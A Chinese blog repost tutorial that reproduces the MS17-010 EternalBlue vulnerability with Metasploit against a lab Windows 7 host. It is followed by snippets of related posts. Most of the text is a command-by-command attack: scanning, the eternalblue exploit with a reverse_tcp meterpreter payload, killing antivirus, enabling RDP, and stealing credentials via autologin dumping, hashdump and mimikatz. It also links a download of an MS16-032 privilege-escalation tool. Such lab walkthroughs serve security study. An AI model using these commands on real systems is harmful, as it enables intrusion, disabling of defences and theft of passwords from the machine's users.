23.通过MS17_010来学习msf对渗透的利用

最新推荐文章于 2024-10-07 20:27:34 发布
最新推荐文章于 2024-10-07 20:27:34 发布
阅读量409 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 git shell
原文链接:http://www.cnblogs.com/bmjoker/p/10151708.html
本文通过复现MS17_010漏洞,详细介绍了如何使用Metasploit进行渗透测试。从扫描、利用漏洞到后渗透阶段,包括信息收集、权限维持等关键步骤。

 

Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段。本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit。

漏洞环境:

      靶机:windows 7 (192.168.0.135)

      攻击机:kali 2018 (192.168.0.133)

开始之前先来熟悉 Metaspolit 基本术语:

Auxiliaries(辅助模块),Exploit(漏洞利用模块),Payload(攻击载荷模块),Post(后期渗透模块),Encoders(编码工具模块)

1.加载smb扫描模块

msf > search auxiliary/scanner/smb

发现可利用的smb_ms17_010模块

2.加载漏洞扫描模块对ip段进行漏洞扫描:

msf > use auxiliary/scanner/smb/smb_ms17_010

msf > set rhosts 192.168.0.100-150

msf > set threads 10

msf > run

发现 192.168.0.135 这台主机可能存在MS17_010漏洞

3.利用nmap对漏洞主机进行探测:

msf > nmap -T4 -A 192.168.0.135

发现敏感端口139,445开启

4.搜索MS17_010可利用漏洞模块

msf > search ms17_010

(没有的话 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)

5.加载漏洞利用模块,设置参数

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set lhost 192.168.0.133

msf > set rhost 192.168.0.135

msf > set payload windows/x64/meterpreter/reverse_tcp

msf > exploit

可以看到漏洞利用成功,现在是 system 最高权限

6.信息查看

进程迁移:

因为shell都是不稳定的,所以需要找到一个可靠的进程,迁移过去:

migrate 要迁移的进城号

查看系统信息:

meterpreter > sysinfo

查看是否为虚拟机:

meterpreter > run post/windows/gather/checkvm

查看目标机运行时间:

meterpreter > idletime

查看完整网络设置:
meterpreter > route

关闭杀毒软件:

meterpreter > run post/windows/manage/killav

启动目标机的远程桌面协议,开启3389端口:

meterpreter > run post/windows/manage/enable_rdp

可以看到已经成功启动了远程桌面。

列举当前登陆过的用户:

meterpreter > run post/windows/gather/enum_logged_on_users

可以看到有 SecEvery,Administrator两个用户。

列举安装在目标机上的应用程序:

meterpreter > run post/windows/gather/enum_applications

将当前Meterpreter终端隐藏在后台:

meterpreter > background

需要重新调用终端:

meterpreter > sessions -i 1

 

很多用户习惯将计算机设置为自动登陆,下面这个命令可以抓取自动登陆的用户名和密码:

meterpreter > run windows/gather/credentials/windows_autologin

下载c盘下1.txt文件到/home目录下:

meterpreter > download c:\txt /home

上传/home目录下1.txt文件到c盘下:

meterpreter > upload /home/1.txt c:\

密码抓取:

1.使用Hashdump抓取密码

Hashdump Meterpreter脚本可以从目标机中提取Hash值,破解Hash值即可获得登陆密码。计算机中的每个账号(如果是域服务器,则为域内的每个账号)的用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要想访问就必须有“系统级”账号。所以要使用改名了就必须进行权限提升。

在Meterpreter Shel提示符下输入hashdump命令,将导出目标机sam数据库中的Hash:

2.使用Mimikatz抓取密码

加载mimikatz模块:

meterpreter > load mimikatz

看了大概使用方法后,既可以使用Metasploit内建的命令,也可以使用Mimikatz自带的命令从目标机器上导出Hash和明文证书。

抓取系统Hash:

meterpreter > msv

md5解密:

抓取系统票据:

meterpreter > kerberos

获取系统账户信息:

 

----------------------------------------------------------------------------------

emmmm....为了给这篇文章增加一点营养,这里另附使用MS16_032对 windows 2003 进行溢出提权:

另附ms16_032提权小工具:

https://pan.baidu.com/s/141N6rXVO7mGvuXfp5UzzBA

提取码:yavh      解压码: 96sec.org

参考链接:

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/lsgxeva/p/8450277.html

https://www.cnblogs.com/backlion/p/6804863.html

http://www.96sec.org/blog/post/243.html

转载于:https://www.cnblogs.com/bmjoker/p/10151708.html

永恒之蓝漏洞复现(ms17-010)
渗透之路,攻防之间皆学问
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
Metasploit -- 后渗透模块(POST)
Web安全工具库
03-01 1060
​给时间一点时间,让过去过去,让开始开始。。。 ---- 网易云热评 作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 runpost/windows/gather/enum_applications 4、获取用户登录信息 run post/..
post后渗透模块
sweelg的博客
07-16 625
run post/windows/gather/enum_on_users#查看登录过的用户信息 run post/windows/gather/enum_ad_groups #查看组信息 run post/windows/gather/enum_domain #定位域控 run post/windows/gather/enum_ad_computers #域内所有机器 run post/windows/manage/migrate...
渗透流程
weixin_44255856的博客
12-09 1125
渗透流程 权限提升 绕过UAC msf模块 Exploit/windows/local/bypassuac Exploit/windows/local/bypassuac_injection Exploit/windows/local/bypassuac_vbs 系统提权 提高程序运行级别 msf模块(Exploit/windows/local/ask) 缺点:需要uac交互 后渗透...
Metersploit系统参数说明
weixin_30703911的博客
08-30 764
Back参数 Back参数主要⽤用于返回。⽐比如你进⼊入了了某⼀一个漏漏洞洞模块的设置,但是你想再重新选择一个漏漏洞洞模块,那么就需要⽤用到back参数。 这张图说明,才开始我使用了ms08_067_netapi的利用模块,之后使⽤了back参数返回。 Banner参数 这个主要是查看metasploit的版本信息,利利⽤用模块数量量、payload数量量等等。 ...
Metasploit详解 详细图文教程
u012558785的专栏
10-07 6946
Metasploit详解 详细图文教程   2013-05-25 00:58:02|  分类: 工具 |  标签: |举报 |字号大中小 订阅 一、metasploit简介     Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metas
利用 MS17-010MSF 模块学习
震山的博客
08-30 728
利用 MS17-010MSF 的各个模块进行再次学习
通过Metasploit实现MS17-010(永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1425
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
kali 使用 msf通过sm17_010漏洞拿到Windows shell
kk的博客
07-30 656
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件。
Windows操作系统下的MS17_010漏洞利用
Ypraise的博客
10-07 775
攻击者在正常或非正常连接时与目标靶机建立联系后,通过目标主机上的445端口msf漏洞,用kali直接控制。
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit中使用,亲测可用。
渗透测试[Metsaploit]
qq_48814526的博客
05-25 531
msfconsole工具和各类渗透方法的使用。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1836
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
开源一个ShellCode生成框架
鬼手的博客
05-25 3008
文章目录前言项目预览项目配置文件命名与作用ShellCode大小的计算方法第一部分 ShellCode生成第二部分 ShellCode部分ShellCode加载器如何提取ShellCode如何扩展ShellCode框架?参考资料项目下载 前言 现阶段,shellcode编写门槛高,大多需要有较深的汇编功底,而Metersploit上的Shellcode开源生成框架,功能单一,扩展性差,大多只能在d...
使用metersploit攻击操作系统【网络安全/渗透测试/CTF】
m0_75203410的博客
03-03 523
RHost是我们要攻击的目标ip地址,我这里使用的是Windows serve 2008,其IP地址为:192.168.88.130。(开玩笑的,这种攻击最好在虚拟机上进行,不然容易出事哈,大家懂的都懂)不过在自己搭建的虚拟机上进行一些小操作还是可以的。永恒之蓝包含四种不同的漏洞,每种漏洞都有discription描述其具体可利用漏洞的形式,根据描述和需要选择你要进行的漏洞攻击形式(这里以第一个漏洞为例)攻击成功后,如果你不知道进行什么小操作,你可以输入命令help来查看一些可以进行的操作。
msfh零二一_MSFH-003:二师姐诗月圆粉墨登场
weixin_32452829的博客
12-28 3万+
大家还记得水沢美心吗?就是上个月底在SOD集团新片商Ms.SOD登场的摩登女郎,作为新片商的开路先锋,水沢美心向观众展示了自己的不凡魅力,如今已经过去了1个月,Ms.SOD再次迎来了第二位新秀,她的名字叫做诗月圆,登场作品MSFH-003。通常新片商的首位女艺人都备受关注,例如FALENO旗下的美乃雀以及Ms.SOD的水沢美心,但詩月まどか的出现却打破了这一常规,以Ms.SOD第二位女艺人身份出场...
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 10万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
Metasploit介绍
千寻的博客
02-18 2547
文章目录Metasploit的介绍MSF中exploit模块漏洞利用exploit攻击载荷(payload)Metasploit中的 Payload 模块Meterpreter摘抄 Metasploit的介绍 MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新 Metasploit可以用来信息收集、漏洞探测、漏洞利用渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。 刚开始的Metasploit是采用Perl语言编写的,但是再后来
Metasploit权限提升全剧终
Fly_鹏程万里
07-06 5808
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限。提升权限的方式分为两类。纵向提权:低权限角色获得高...
msfms17-010
最新发布
02-25
### 使用 Metasploit 执行 MS17-010 漏洞利用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞利用模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞的攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值